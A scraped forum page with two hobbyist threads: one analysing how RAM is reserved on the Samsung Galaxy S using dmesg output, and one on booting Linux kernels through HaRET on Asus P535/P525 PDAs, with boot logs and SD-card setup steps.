This is where our RAM is used - Galaxy S I9000 Android Development

Hi guys,
Not sure if this has been found yet, but in the dmesg logs you can see how the RAM on the Galaxy S is reserved.
This is from the JPK ROM:
[ 0.000000] S5PV210: PLL settings, A=800000000, M=667000000, E=96000000
[ 0.000000] s5pv210: 37748736 bytes system memory reserved for mfc at 0x30ec2000
[ 0.000000] s5pv210: 37748736 bytes system memory reserved for mfc at 0x40204000
[ 0.000000] s5pv210: 14680064 bytes system memory reserved for fimc0 at 0x42604000
[ 0.000000] s5pv210: 1048576 bytes system memory reserved for fimc1 at 0x43404000
[ 0.000000] s5pv210: 12582912 bytes system memory reserved for fimc2 at 0x43504000
[ 0.000000] s5pv210: 16777216 bytes system memory reserved for pmem at 0x332c2000
[ 0.000000] s5pv210: 10485760 bytes system memory reserved for pmem_gpu1 at 0x342c2000
[ 0.000000] s5pv210: 1536000 bytes system memory reserved for pmem_adsp at 0x34cc2000
[ 0.000000] s5pv210: 5132288 bytes system memory reserved for jpeg at 0x44104000
[ 0.000000] s5pv210: 10485760 bytes system memory reserved for texstream at 0x445e9000
[ 0.000000] s5pv210: 3145728 bytes system memory reserved for fimd at 0x44fe9000
[ 0.000000] s5pv210: 262144 bytes system memory reserved for wifi at 0x34e39000
[ 0.000000] Built 3 zonelists in Zone order, mobility grouping on. Total pages: 117856
[ 0.000000] Kernel command line: console=ttySAC2,115200 loglevel=4
[ 0.000000] PID hash table entries: 2048 (order: 1, 8192 bytes)
[ 0.000000] Dentry cache hash table entries: 65536 (order: 6, 262144 bytes)
[ 0.000000] Inode-cache hash table entries: 32768 (order: 5, 131072 bytes)
[ 0.000000] Memory: 80MB 256MB 128MB = 464MB total
[ 0.000000] Memory: 308048KB available (9224K code, 1910K data, 2868K init, 0K highmem)
I added up all the "system memory reserved for..." lines and got 151,633,920 bytes (144.6MB) reserved.
So the kernel can definitely see about 464MB of RAM in this case, but only 308,048KB is available.

hardcore said:
Hi guys,
Not sure if this has been found yet, but in the dmesg logs you can see how the RAM on the Galaxy S is reserved.
This is from the JPK ROM:
[ 0.000000] S5PV210: PLL settings, A=800000000, M=667000000, E=96000000
[ 0.000000] s5pv210: 37748736 bytes system memory reserved for mfc at 0x30ec2000
[ 0.000000] s5pv210: 37748736 bytes system memory reserved for mfc at 0x40204000
[ 0.000000] s5pv210: 14680064 bytes system memory reserved for fimc0 at 0x42604000
[ 0.000000] s5pv210: 1048576 bytes system memory reserved for fimc1 at 0x43404000
[ 0.000000] s5pv210: 12582912 bytes system memory reserved for fimc2 at 0x43504000
[ 0.000000] s5pv210: 16777216 bytes system memory reserved for pmem at 0x332c2000
[ 0.000000] s5pv210: 10485760 bytes system memory reserved for pmem_gpu1 at 0x342c2000
[ 0.000000] s5pv210: 1536000 bytes system memory reserved for pmem_adsp at 0x34cc2000
[ 0.000000] s5pv210: 5132288 bytes system memory reserved for jpeg at 0x44104000
[ 0.000000] s5pv210: 10485760 bytes system memory reserved for texstream at 0x445e9000
[ 0.000000] s5pv210: 3145728 bytes system memory reserved for fimd at 0x44fe9000
[ 0.000000] s5pv210: 262144 bytes system memory reserved for wifi at 0x34e39000
[ 0.000000] Built 3 zonelists in Zone order, mobility grouping on. Total pages: 117856
[ 0.000000] Kernel command line: console=ttySAC2,115200 loglevel=4
[ 0.000000] PID hash table entries: 2048 (order: 1, 8192 bytes)
[ 0.000000] Dentry cache hash table entries: 65536 (order: 6, 262144 bytes)
[ 0.000000] Inode-cache hash table entries: 32768 (order: 5, 131072 bytes)
[ 0.000000] Memory: 80MB 256MB 128MB = 464MB total
[ 0.000000] Memory: 308048KB available (9224K code, 1910K data, 2868K init, 0K highmem)
I added up all the "system memory reserved for..." lines and got 151,633,920 bytes (144.6MB) reserved.
So the kernel can definitely see about 464MB of RAM in this case, but only 308,048KB is available.
Click to expand...
Click to collapse
That's interesting. If we take the line:
Memory: 80MB 256MB 128MB = 464MB total as the total memory
So adding it all up:
((464 * 1024 (total memory)) - (9224 + 1910 + 2868 (reserved for kernel) + (144.6 * 1024 (reserved by system) ))) / 1024 = 306 MB (available for apps)
However we should be seeing 512Mb not 464 as the total, so we are missing 48 Mb somewhere.

I still don't understand how the Galaxy Tab sees 444MB for actual applications.
http://www.youtube.com/watch?v=KoOWPjIel-c look at 4:40 in this video. it clearly shows how much RAM the tab is seeing.
Maybe we should poke inside the TAB's firmware to find out what is different?
The hardware is almost 1:1 with the SGS.

hardcore said:
Hi guys,
Not sure if this has been found yet, but in the dmesg logs you can see how the RAM on the Galaxy S is reserved.
Click to expand...
Click to collapse
Yes, see this thread starting here.

mtoneman said:
That's interesting. If we take the line:
Memory: 80MB 256MB 128MB = 464MB total as the total memory
So adding it all up:
((464 * 1024 (total memory)) - (9224 + 1910 + 2868 (reserved for kernel) + (144.6 * 1024 (reserved by system) ))) / 1024 = 306 MB (available for apps)
However we should be seeing 512Mb not 464 as the total, so we are missing 48 Mb somewhere.
Click to expand...
Click to collapse
It's probably the dalvic-cache!
Because "/system/build.prop" says: "dalvik.vm.heapsize=48m"
Just an idea

any improvements if we set an higher value for dalvik heapsize?

MCOGW said:
It's probably the dalvic-cache!
Because "/system/build.prop" says: "dalvik.vm.heapsize=48m"
Just an idea
Click to expand...
Click to collapse
This is the max heapsize for a single VM...meaning
the single application can allocate max of 48Mb heap before it gets out of memory.
This has nothing to do with RAM reservation

MCOGW said:
It's probably the dalvic-cache!
Because "/system/build.prop" says: "dalvik.vm.heapsize=48m"
Just an idea
Click to expand...
Click to collapse
No its not the dalvik heapsize. Changing that value doesn't give us more usable RAM.
I'm wondering about the Tab too. I was playing with a prototype and it definitely had more accessible RAM, as one poster said - more than 400MB. Would be good to see the dmesg boot log from a Tab to see what the system reserved and total memory is.

According to this:
http://forum.xda-developers.com/showthread.php?t=792512&page=11
there are one 2GBit (256MByte) and 2 x 1GBit (128MByte each) RAM chips totalling 512MBytes on the board. What we need to find out is why the kernel is reporting "Memory: 80MB 256MB 128MB".
i.e. what happened to the 48MByte on one of the 1GBit modules.

hardcore said:
No its not the dalvik heapsize. Changing that value doesn't give us more usable RAM.
Click to expand...
Click to collapse
I don't think it's that easy to (really) modifiy this value. I think you need a JTAG to modify this because these are direct parameters for the (smdkc110) chip.
So how did you manage (and verified) this?

If you would have read this thread:
http://forum.xda-developers.com/showthread.php?t=792512
You probably have read this:
http://forum.xda-developers.com/showpost.php?p=8325266&postcount=18
Ok it is not directly a "blackhole", but it is reserved.
The SGS kernel config tells you a bit more for what it is reserved:
Code:
CONFIG_ANDROID_PMEM_MEMSIZE_PMEM=16384
CONFIG_ANDROID_PMEM_MEMSIZE_PMEM_GPU1=8192
CONFIG_ANDROID_PMEM_MEMSIZE_PMEM_ADSP=1800
...
CONFIG_VIDEO_SAMSUNG_MEMSIZE_FIMC0=12288
CONFIG_VIDEO_SAMSUNG_MEMSIZE_FIMC1=1024
CONFIG_VIDEO_SAMSUNG_MEMSIZE_FIMC2=12288
CONFIG_VIDEO_SAMSUNG_MEMSIZE_MFC0=32768
CONFIG_VIDEO_SAMSUNG_MEMSIZE_MFC1=32768
CONFIG_VIDEO_SAMSUNG_MEMSIZE_TEXSTREAM=10240
16 (16384)
+ 8 (8192)
+ 1,75 (1800)
+ 12 (12288)
+ 1 (1024)
+ 12 (12288)
+ 32 (32768)
+ 32 (32768)
+ 10 (10240)
112 mb
And 48 mb are not in the mem map, so 112+48 = 160
512-160=352mb
but we have a total of 325 mb (jm8)
352-325=27 are still missing
Have a look at /proc/iomem for these 27mb yourself.
And by reading that:
http://forum.xda-developers.com/showpost.php?p=8350492&postcount=126
jpk is only missing 32 mb = gpu.
So everything is fine on the ram amount, nothing to worry about.

Ok I just read up on the other threads (sorry missed those initially). If I understood correctly, the radio is separate and not visible to the linux kernel (unlike the other "reserved" blocks). This probably amounts to the 48MBytes we are not seeing in the Linux dmesg output.

Total guess: the difference in free ram between SGS and the Tab is probably that video ram for the SGS comes out of the system ram, while the Tab probably has a dedicated framebuffer+ram for it's graphics, probably because it's required for the bigger screen.
Why does Froyo have less available ram than Eclair though (hardware is the same)? In fact, why do different Eclair versions have different available ram? Is this just tweaking, and if so, can we not tweak it ourselves?

RyanZA said:
Why does Froyo have less available ram than Eclair though (hardware is the same)? In fact, why do different Eclair versions have different available ram? Is this just tweaking, and if so, can we not tweak it ourselves?
Click to expand...
Click to collapse
Cause it is a different OS? With more or newer components taking various amounts of memory?
This is like saying "why does Windows 7 leave you with less available memory than Windows XP". Ummm because it is not XP.

brunes said:
Cause it is a different OS? With more or newer components taking various amounts of memory?
This is like saying "why does Windows 7 leave you with less available memory than Windows XP". Ummm because it is not XP.
Click to expand...
Click to collapse
Mmm, and why on Nexus one there is the same RAM available in Eclair and Froyo?
And Windows 7 shows exactly the same amount of total RAM available as Windows XP.

burnes,
You are wrong.

brunes said:
Cause it is a different OS? With more or newer components taking various amounts of memory?
This is like saying "why does Windows 7 leave you with less available memory than Windows XP". Ummm because it is not XP.
Click to expand...
Click to collapse
The 'OS' is Linux! It's always important to remember this. Android is just an ecosystem (a number of apps and services) running on top of stock linux. Just because Android has gone up a version, doesn't mean the underlying system has changed! Any changes to Android components are actually all far outside the kernel, and will use up the same ram as other userland apps.
The reserved memory has nothing to do with Android, and has everything to do with the hardware drivers. Since the hardware hasn't changed, the question is why the graphics and low level drivers have been allocated more ram in Froyo than in Eclair.
Possible explanations are that Samsung gave more ram to graphics to help with... something? Maybe OpenGL ES 2 needs more ram, and performs worse than OpenGL ES 1, and so the OpenGL ES 2 driver needs to eat up more ram now? Or the Froyo drivers might just be badly optimized. In any case, it seems like we can tweak this stuff, because Samsung can tweak it.
The question is, how do we tweak it? In the kernel video drivers? Are there open specs available that we could use to work it out? And more questions I can't think of...

Well actually comparing dmesg and iomem outputs from JM8 and JPK would answer a lot of questions.
Speculating is leading us nowhere.

xan said:
Well actually comparing dmesg and iomem outputs from JM8 and JPK would answer a lot of questions.
Speculating is leading us nowhere.
Click to expand...
Click to collapse
I think a very deep look at this http://opensource.samsung.com/ (and a search for "GT-I9000") would answer lots of questions (only for Eclair atm)...

MCOGW said:
I think a very deep look at this http://opensource.samsung.com/ (and a search for "GT-I9000") would answer lots of questions (only for Eclair atm)...
Click to expand...
Click to collapse
<sarcasm>Wow thanks for the link, I'm sure none of the devs on here have bothered to check!</sarcasm>

Related

Haret + Asus P535

Hello !
I PDAphone a asus P535 running Windows Mobile 6 that I would like to try Linux.
These characteristics:
-processor PXA270 520Mhz
-256Mo ROM
-64Mo RAM
-GPS SiRFStar III
-bluetooth
-Usb 1.1
-Wifi IEEE 802.11b+g
I am trying last week to launch a kernel image with Android Haret.exe it does not work.
I have a black screen that appears with:
Haret boot
Shutting down hardware
Turning off MMU...
In preloader
PSR=600000df
Kernel relocated
initrd relocated
jumping to kernel...
Can you help me?
You should create the 'earlyharetlog.txt' file in the same directory as haret.exe
and run haret.exe
It will create the haretlog.txt file, which you may post here.
Haret = haretlog.txt
Thank you.
Could - you tell me where I made a mistake.
Here is the file "log":
===== HaRET 0.5.1 =====
Setting KMode to true.
Old KMode was 1
Finished initializing output
Loading dynamically bound functions
Function '[email protected]@[email protected]@[email protected]' in library 'gx' at 0248D9EC
Function '[email protected]@YAHXZ' in library 'gx' at 0248DDD8
Function '[email protected]@YAPAXXZ' in library 'gx' at 0248D2A8
Function '[email protected]@YAHXZ' in library 'gx' at 0248D36C
Function 'LoadLibraryExW' in library 'coredll' at 03F65FE0
Function 'GetSystemPowerStatusEx2' in library 'coredll' at 03F6C9A8
Function 'SleepTillTick' in library 'coredll' at 03F65F00
Function 'AllocPhysMem' in library 'coredll' at 03F65E38
Function 'FreePhysMem' in library 'coredll' at 03F65EA4
Function 'CreateToolhelp32Snapshot' in library 'toolhelp' at 02E1505C
Function 'Process32First' in library 'toolhelp' at 02E15140
Function 'Process32Next' in library 'toolhelp' at 02E151AC
Function 'Module32First' in library 'toolhelp' at 02E15340
Function 'Module32Next' in library 'toolhelp' at 02E153B0
Function 'CloseToolhelp32Snapshot' in library 'toolhelp' at 02E1507C
Unable to load library 'ace_ddi'
Unable to load library 'ace_ddi'
Unable to load library 'ace_ddi'
Unable to load library 'ace_ddi'
Unable to load library 'ace_ddi'
Unable to load library 'ace_ddi'
Unable to load library 'ace_ddi'
Unable to load library 'ace_ddi'
Detecting memory
WinCE reports memory size 67108864 (phys=53121024 store=171950080)
Detecting current machine
Trying to detect machine (Plat='PocketPC' OEM='Asus P535')
Wince reports processor: core=PXA270 name=520Mhz cat= vend=Intel
Looking at machine Alpine
Looking at machine Apache
Looking at machine AximX50
Looking at machine AximX5
Looking at machine Beetles
Looking at machine Blueangel
Looking at machine Himalaya
Looking at machine Magician
Looking at machine Universal
Looking at machine H1910
Looking at machine H1940
Looking at machine H2200
Looking at machine H3600b
Looking at machine H3700
Looking at machine H3870
Looking at machine H3900
Looking at machine H4000
Looking at machine H4300
Looking at machine H5000
Looking at machine H6340
Looking at machine HX2000
Looking at machine HX4700
Looking at machine Sable
Looking at machine Wizard
Looking at machine Hermes
Looking at machine Trinity
Looking at machine Athena
Looking at machine G500
Looking at machine Artemis
Looking at machine Herald
Looking at machine Prophet
Looking at machine RX3000
Looking at machine Treo700wx
Looking at machine e310
Looking at machine e740
Looking at machine Acer_n30
Looking at machine Mio_P550
Looking at machine Kaiser
Looking at machine Loox5xx
Looking at machine Jornada820
Looking at machine H3100
Looking at machine H3600a
Looking at machine Tornado
Looking at machine Libra
Looking at machine Generic Intel PXA27x
Looking at machine Generic Intel PXA
Looking at machine Generic TI OMAP
Looking at machine Generic TI OMAP15xx
Looking at machine Generic Samsung s3c24xx
Looking at machine Generic MSM7500
Looking at machine Generic ARM 920t
Looking at machine Generic ARM 926
Looking at machine Generic ARM v6
Looking at arch Generic Intel PXA27x
Registering command IGPIO
Registering command WG|PIO
Registering command GPLR
Registering command GPDR
Registering command GAFR
Registering command GPIO
Registering command GPIOST
Registering command LOADLIBRARYEX
Registering command TRACES
Registering command RESUMETRACES
Registering command WI|RQ
Registering command TRACE
Registering command TRACEMASK
Registering command TRACE2
Registering command TRACETYPE
Registering command TRACE2TYPE
Registering command TRACEFORWATCH
Registering command INSN
Registering command INSNREENABLE
Registering command INSNREG1
Registering command INSNREG2
Registering command INSN2
Registering command INSN2REENABLE
Registering command INSN2REG1
Registering command INSN2REG2
Registering command ALTL1TRACE
Registering command MAXL1TRACE
Registering command MAXL1TRACERESUME
Registering command MMUTRACE
Registering command TRACEIGNORE
Registering command PERMISSIVEMMUTRACE
Registering command KILL
Registering command PS
Registering command LSMOD
Registering command ADDR2MOD
Registering command AC97
Not registering command ATIDBG
Initializing for machine 'Generic Intel PXA27x'
HaRET(1)# set ramaddr 0xa0000000
HaRET(2)# addlist IRQS p2v(0x40D00000) 0x480 32 0
HaRET(3)# addlist IRQS p2v(0x40D0009c) 0xfffffffc 32 0
HaRET(4)# addlist IRQS p2v(0x40E00048) 0 32 0
HaRET(5)# addlist IRQS p2v(0x40E0004c) 0 32 0
HaRET(6)# addlist IRQS p2v(0x40E00050) 0 32 0
HaRET(7)# addlist IRQS p2v(0x40E00148) 0 32 0
HaRET(8)# addlist GPIOS p2v(0x40E00000)
HaRET(9)# addlist GPIOS p2v(0x40E00004)
HaRET(10)# addlist GPIOS p2v(0x40E00008)
HaRET(11)# addlist GPIOS p2v(0x40E00100)
HaRET(12)# addlist GPIOS p2v(0x40E0000C)
HaRET(13)# addlist GPIOS p2v(0x40E00010)
HaRET(14)# addlist GPIOS p2v(0x40E00014)
HaRET(15)# addlist GPIOS p2v(0x40E0010C)
HaRET(16)# addlist GPIOS p2v(0x40E00054)
HaRET(17)# addlist GPIOS p2v(0x40E00058)
HaRET(18)# addlist GPIOS p2v(0x40E0005c)
HaRET(19)# addlist GPIOS p2v(0x40E00060)
HaRET(20)# addlist GPIOS p2v(0x40E00064)
HaRET(21)# addlist GPIOS p2v(0x40E00068)
HaRET(22)# addlist GPIOS p2v(0x40E0006c)
HaRET(23)# addlist GPIOS p2v(0x40E00070)
HaRET(24)# newvar CLOCKS GPIOS 'Architecture clock registers'
HaRET(25)# addlist CLOCKS p2v(0x41300000)
HaRET(26)# addlist CLOCKS p2v(0x41300004)
HaRET(27)# addlist CLOCKS p2v(0x41300008)
HaRET(28)# addlist CLOCKS p2v(0x4130000C)
HaRET(29)# addlist CLOCKS cp 14 0 6 0 0
HaRET(30)# addlist CLOCKS cp 14 0 7 0 0
Welcome, this is HaRET 0.5.1 running on WindowsCE v5.2
Minimal virtual address: 00010000, maximal virtual address: 7FFFFFFF
Detected machine Generic Intel PXA27x/PXA27x (Plat='PocketPC' OEM='Asus P535')
CPU is Intel ARM arch 5TE revision 0 product 17 stepping 7 running in system mode
Enter 'HELP' for a short command summary.
Running WSAStartup
Starting gui
In initdialog
Found machine Generic Intel PXA27x
executing startup.txt
HaRET(1)# set mtype 535
HaRET(2)# set kernel "zImage"
HaRET(3)# boot
boot KERNEL=zImage INITRD=
Opening file zImage
boot params: RAMADDR=a0000000 RAMSIZE=04000000 MTYPE=535 CMDLINE='root=/dev/ram0 ro console=tty0'
Boot FB feedback: 1
Built virtual to physical page mapping
Allocated 307 pages (tags=4EC00000/a2309000 kernel=4EC01000/a2308000 initrd=4ED2F000/a21a1000 index=4ED2F000/a21a1000)
Built kernel tags area
Built page index
Video buffer at 48A00080 sx=240 sy=320 mx=60 my=53
Video Phys FB=5c000080 Fonts=a219f064
[email protected]/a219e000 sj=4ED32000 stack=4ED30000/a21a0000 data=4ED31000/a219f000 exec=a219e128
Reading 1235904 bytes...
Read complete
Launching to physical address a219e010
Trampoline setup ([email protected]/1e0241c0/a0b831c0)
MMU setup: mmu=A87D0000/a07d0000
Go Go Go...
To begin with, you need to dump gpio table and pxa27xlccr (with gnuharet).. and then make your own kernel. but you could try my kernel from asus p525
http://rapidshare.com/files/116299470/zImage.html
and yes, for it not to hang. use this startup.txt
set KERNEL zImage
set MTYPE 1554
set CMDLINE "debug rootdelay=10 root=/dev/ram0 console=tty0 fbcon=rotate:0 mem=64M"
boot2
sp3dev said:
To begin with, you need to dump gpio table and pxa27xlccr (with gnuharet)..
Click to expand...
Click to collapse
I've ported the 'dump pxa27x' command to mainline haret:
http://jornada820.sf.net/files/haret/haret-w.exe
but you could try my kernel from asus p525
Click to expand...
Click to collapse
I don't see asus 525 mentioned here
http://www.handhelds.org/moin/moin.cgi/SupportedHandheldSummary
Can you provide the kernel patch for it ?
yes, i mean dump pxa27xgpio of course.. i think i will add asus to hh cvs.. but not now. i've been rather busy. anyhow, i will need to clean the code and fix audio before it.
btw, could you help me with linux? actually, not with hardware (though i need some help with joystick and pca9535).. with qtopia.
btw, thanks for haret
Can any one please post the whole package ? I cant make it run.
thx
sp3dev said:
yes, i mean dump pxa27xgpio of course..
Click to expand...
Click to collapse
'dump pxa27x' in haret-w.exe includes the output of all 'dump pxa27x*' commands
in gnu-haret.
btw, could you help me with linux? actually, not with hardware (though i need some help with joystick and pca9535).. with qtopia.
Click to expand...
Click to collapse
I think you should take the qtopia image from universal, and set joystick key events
to match those used by universal.
If you run the kernel, please write message
Ok, ATM it seems only me and DaLiV are working on linux on p525. but we wouldnt mind anyone join us.
We have 2.6.21 kernel, correctly set up fb, partly working keypad, sd memory through pxa mmc driver, corgi-bl driver and touchscreen
Sound is working through pxa2xx-ac97, headphones only. need to set volume via alsamixer. we are working on wm9713 driver
The things that are to be done (the most important ones, in the decreasing order of importance)
UDC
Suspend
PCA9535 i2c
Bluetooth
Phone
Anyone who wants to test it
http://rapidshare.com/files/118520723/ln.tgz.html
http://familiar.handhelds.org/relea...0/gpe-image-v0.8.4-ipaq-pxa270.rootfs.tar.bz2
Create an ext2 partition on your flash card (second partition, primary. or edit default.txt)
unpack (e.g. if your flash is - /media/usbdisk-1
bunzip2 gpe-image-v0.8.4-ipaq-pxa270.rootfs.tar.bz2
tar xvpf gpe-image-v0.8.4-ipaq-pxa270.rootfs.tar -C /media/usbdisk-1
certainly, this is to be done under root. to keep permissions for all files
then,
sync
remove /lib/modules and replace with ours. the same is with /etc/modutils
That is all. just copy all files from 'kernel' dir to your pda and run haret.exe
And the log
[ 0.000000] Linux version 2.6.21-hh20 ([email protected]) (gcc version 4.2.1) #94 PREEMPT Fri May 30 21:25:16 MSD 2008
[ 0.000000] CPU: XScale-PXA270 [69054117] revision 7 (ARMv5TE), cr=0000397f
[ 0.000000] Machine: Asus P525
[ 0.000000] Memory policy: ECC disabled, Data cache writeback
[ 0.000000] On node 0 totalpages: 16384
[ 0.000000] DMA zone: 128 pages used for memmap
[ 0.000000] DMA zone: 0 pages reserved
[ 0.000000] DMA zone: 16256 pages, LIFO batch:3
[ 0.000000] Normal zone: 0 pages used for memmap
[ 0.000000] Run Mode clock: 208.00MHz (*16)
[ 0.000000] Turbo Mode clock: 208.00MHz (*1.0, active)
[ 0.000000] Memory clock: 104.00MHz (/2)
[ 0.000000] System bus clock: 208.00MHz
[ 0.000000] CPU0: D VIVT undefined 5 cache
[ 0.000000] CPU0: I cache: 32768 bytes, associativity 32, 32 byte lines, 32 sets
[ 0.000000] CPU0: D cache: 32768 bytes, associativity 32, 32 byte lines, 32 sets
[ 0.000000] Built 1 zonelists. Total pages: 16256
[ 0.000000] Kernel command line: debug rootdelay=10 root=/dev/mmcblk0p2 console=tty0 fbcon=rotate:0 mem=64M
[ 0.000000] PID hash table entries: 256 (order: 8, 1024 bytes)
[ 0.000000] Console: colour dummy device 80x30
[ 0.000000] Dentry cache hash table entries: 8192 (order: 3, 32768 bytes)
[ 0.000000] Inode-cache hash table entries: 4096 (order: 2, 16384 bytes)
[ 0.000000] Memory: 64MB = 64MB total
[ 0.000000] Memory: 61988KB available (2608K code, 182K data, 84K init)
[ 0.010000] Calibrating delay loop... 207.25 BogoMIPS (lpj=1036288)
[ 0.200000] Mount-cache hash table entries: 512
[ 0.200000] CPU: Testing write buffer coherency: ok
[ 0.200000] NET: Registered protocol family 16
[ 0.230000] usbcore: registered new interface driver usbfs
[ 0.230000] usbcore: registered new interface driver hub
[ 0.230000] usbcore: registered new device driver usb
[ 0.240000] Time: pxa_timer clocksource has been installed.
[ 0.240000] NET: Registered protocol family 2
[ 0.310000] IP route cache hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.310000] TCP established hash table entries: 2048 (order: 2, 16384 bytes)
[ 0.310000] TCP bind hash table entries: 2048 (order: 1, 8192 bytes)
[ 0.310000] TCP: Hash tables configured (established 2048 bind 2048)
[ 0.310000] TCP reno registered
[ 0.340000] PXA CPU frequency change support initialized
[ 0.340000] NetWinder Floating Point Emulator V0.97 (double precision)
[ 0.340000] JFFS2 version 2.2. (NAND) (C) 2001-2006 Red Hat, Inc.
[ 0.340000] io scheduler noop registered
[ 0.340000] io scheduler anticipatory registered (default)
[ 0.340000] io scheduler deadline registered
[ 0.350000] Corgi Backlight Driver Initialized.
[ 0.360000] Console: switching to colour frame buffer device 30x40
[ 0.450000] SA1100/PXA2xx Watchdog Timer: timer margin 60 sec
[ 0.450000] pxa2xx-uart.0: ttyS0 at MMIO 0x40100000 (irq = 22) is a FFUART
[ 0.450000] pxa2xx-uart.1: ttyS1 at MMIO 0x40200000 (irq = 21) is a BTUART
[ 0.460000] pxa2xx-uart.2: ttyS2 at MMIO 0x40700000 (irq = 20) is a STUART
[ 0.490000] RAMDISK driver initialized: 16 RAM disks of 4096K size 1024 blocksize
[ 0.510000] loop: loaded (max 8 devices)
[ 0.520000] usbmon: debugfs is not available
[ 0.530000] ohci_hcd: 2006 August 04 USB 1.1 'Open' Host Controller (OHCI) Driver
[ 0.550000] usbcore: registered new interface driver usbhid
[ 0.560000] drivers/usb/input/hid-core.c: v2.6:USB HID core driver
[ 0.580000] pxa27x_udc: version 01-01-2006
[ 0.590000] UDC disconnected.
[ 0.600000] UDC disconnected.
[ 0.610000] ether gadget: using random self ethernet address
[ 0.620000] ether gadget: using random host ethernet address
[ 0.640000] usb0: Ethernet Gadget, version: May Day 2005
[ 0.650000] usb0: using pxa27x_udc, OUT ep2out-bulk IN ep1in-bulk STATUS ep3in-intr
[ 0.670000] usb0: MAC 0e:8c:22:12:b3:da
[ 0.680000] usb0: HOST MAC 06:2f:b7:42:8d:6e
[ 0.690000] usb0: RNDIS ready
[ 0.810000] UDC connect.
[ 0.810000] input: gpio-keys as /class/input/input0
[ 0.830000] input: pxa27x-keyboard as /class/input/input1
[ 0.840000] PXA27x keyboard controller enabled
[ 0.850000] sa1100-rtc sa1100-rtc: rtc intf: sysfs
[ 0.870000] sa1100-rtc sa1100-rtc: rtc intf: proc
[ 0.880000] sa1100-rtc sa1100-rtc: rtc intf: dev (254:0)
[ 0.890000] sa1100-rtc sa1100-rtc: rtc core: registered sa1100-rtc as rtc0
[ 0.910000] APM Battery Driver
[ 0.920000] min dma period: 1230768 ps, new clock 624000 kHz
[ 0.930000] min dma period: 1230768 ps, new clock 624000 kHz
[ 0.960000] Advanced Linux Sound Architecture Driver Version 1.0.14rc3 (Wed Mar 14 07:25:50 2007 UTC).
[ 1.040000] ALSA device list:
[ 1.050000] #0: pxa2xx-ac97 (Wolfson WM9713,WM9714)
[ 1.060000] TCP cubic registered
[ 1.070000] NET: Registered protocol family 1
[ 1.080000] NET: Registered protocol family 17
[ 1.090000] XScale iWMMXt coprocessor detected.
[ 1.100000] sa1100-rtc sa1100-rtc: setting the system clock to 1970-01-01 15:22:38 (55358)
[ 1.120000] Waiting 10sec before mounting root device...
[ 1.140000] mmcblk0: mmc0:b368 SD 501248KiB
[ 1.150000] mmcblk0: p1 p2 p3
[ 11.180000] EXT2-fs warning: mounting unchecked fs, running e2fsck is recommended
[ 11.200000] VFS: Mounted root (ext2 filesystem).
[ 11.210000] Freeing init memory: 84K
[ 46.750000] wm97xx: version 0.65 [email protected]
[ 46.780000] wm97xx: detected a wm9713 codec
[ 46.810000] input: wm97xx touchscreen as /class/input/input2
[ 46.840000] wm97xx: setting pen detect pull-up to 8000 Ohms
hi
tried on my o2zinc as it has the same processor, will report on any prog. thx
sp3dev said:
Anyone who wants to test it
http://rapidshare.com/files/118520723/ln.tgz.html
http://familiar.handhelds.org/relea...0/gpe-image-v0.8.4-ipaq-pxa270.rootfs.tar.bz2
Create an ext2 partition on your flash card (second partition, primary. or edit default.txt)
unpack (e.g. if your flash is - /media/usbdisk-1
bunzip2 gpe-image-v0.8.4-ipaq-pxa270.rootfs.tar.bz2
tar xvpf gpe-image-v0.8.4-ipaq-pxa270.rootfs.tar -C /media/usbdisk-1
certainly, this is to be done under root. to keep permissions for all files
then,
sync
remove /lib/modules and replace with ours. the same is with /etc/modutils
That is all. just copy all files from 'kernel' dir to your pda and run haret.exe
Click to expand...
Click to collapse
i have a p525 with windows mobile 6 and after a lot of messing around and an unwanted hardreset i managed to make it work. i havent checked everything yet, but as far as i can say from the hardware keys only the number keys work.
I keep on having error about vfs root filesystem, any idea ???
how did you make it work? i'm working on windows pc, how do i proceed? or do i have to install linux... ubuntu perhaps?
guys what about port of android for other devices with pxa27x procesors?
Ok, a test build of qtopia for p525
copy haret.exe, default.txt and zImage to your wince pda
then, make an ext2 or reiserfs filesystem on one of sd card partitions. you can find manuals on using fdisk or gparted on the internet. e.g., your new partition is /dev/sde2
then,
mkfs.ext2 /dev/sde2
mkdir /mnt/asus
mount /dev/sde2 /mnt/asus
tar xvpf asus_qtopia.tar.bz2 -C /mnt/asus
cd /mnt/asus
sync
cd /
umount /mnt/asus
Then, edit you default.txt to point to your partition. replace mmcblk0p2 with the partition name, like mmcblk0p3
At the moment you can only use menu, some qtopia apps, gsm calls do not work. Anyone willing to help me implement gsm calling? i can provide you with gsm logs from 525)).
Here are some screenshots
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
Ok, the brief status of the porting
Working in kernel
1. Framebuffer
2. Backlight
3. LEDs and vibro
4. Sound via pxa2xx-ac97 (still need to add sound profiles)
5. Keyboard - partly (only the part connected to pxa)
6. Touchscreen
7. max8588 voltage regulator
8. PCMCIA (not included)
9. SD Memory Card
10. pxa ficp - irda
11. USB partly. if enabled before booting linux
Todo
1. Bluetooth FW loader
2. i2c-connected keypad and joypad
3. Camera (looks like it's mt9m911)
4. Battery (dunno how it is connected)
5. Fix libertas to support our CF8385 B1
As for Qt Extended. GSM is not working. So it's the primary objective for now
If anyone who had the experience with porting qtopia to uni/freerunner/motorola wishes to join the project - you're welcome
http://depositfiles.com/ru/files/awz83fp34
Can't we just use an updated kernel? I mean, kernel 2.6.21 is a little old, and the latest (stable) kernel has bugfixes for the arm platform that 2.6.21 doesn't have.
The kernel in the archive with qtopia is 2.6.27-rc5
sp3dev
Please, can you upload somewhere your kernel config and mach- dir? I'm trying to make kernel for Rover S5 (aka Lenovo ET980), and your kernel is working good on this device (according to the fedora's boot logs), but with 1 major problem - display is not working
p.s. i'm talking about 2.6.21-hh20 kernel config, the new one isn't working
Need help for Asus P565
Hi,
I am on Asus P565 which carries...
Processor - Marvell PXA930
RAM - 128 MB
ROM - 256 MB
Camera - 3.2MP
Inbuilt GPS - SiRF Star III
Can someone share mtype for this phone or guide me to find it by using haret.
Thanks in advance...

Establishing a UART connection to the Ancora

